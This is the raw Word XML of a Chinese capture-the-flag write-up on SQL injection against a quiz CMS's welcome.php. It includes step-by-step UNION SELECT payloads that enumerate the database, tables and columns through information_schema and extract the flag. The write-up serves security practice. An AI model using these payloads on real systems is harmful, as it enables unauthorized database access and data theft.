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iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="242A41"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>简介：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="242A41"/>
        </w:rPr>
        <w:t>该CMS的welcome.php中存在SQL注入攻击。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FFFFFF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="242A41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正常登录进入页面，页面的正常功能是一个答题系统，首先随便探索一下，寻找注入点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56324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注意到不同的题库 eid的值不同，可能会与后端进行交互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尝试使用字符型注入，发现当输入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1= 1 --%20时有内容 当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and 1= 2 --%20 时没有内容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说明存在字符型注入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下一步判断字段数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 by 5 成功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6 失败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Union select 1,2,3,4,5 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="160782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3被返回，说明我们可以通过3这个位置查询自己想要的东西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第一步，获取当前数据库的名称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Union select 1,2,database(),4,5 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="15176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我们想要的东西显然在ctf这个数据库中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顺着这个思路，接下来查询ctf这个数据库中的所有表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Union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema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ctf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="1212215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我们想要的应该在flag表中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查询flag表中的所有字段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Union select 1,2,group_concat(column_name) from information_schema.columns where table_name=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’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="1022985"/>
            <wp:effectExtent l="0" t="0" r="1016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 表下只有一个字段 flag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select 1,2,flag,4,5 from ctf.flag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812165"/>
            <wp:effectExtent l="0" t="0" r="1460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FFFFFF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="242A4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2D6D1DBC"/>
    <w:rsid w:val="6565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2023-10-01T15:37:00Z</dcterms:created>
  <dc:creator>86158</dc:creator>
  <cp:lastModifiedBy>海希安</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-03T10:02:23Z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AF73E4BE23234705BF17A64141E235DA_12</vt:lpwstr>
  </property>
</Properties>
</file>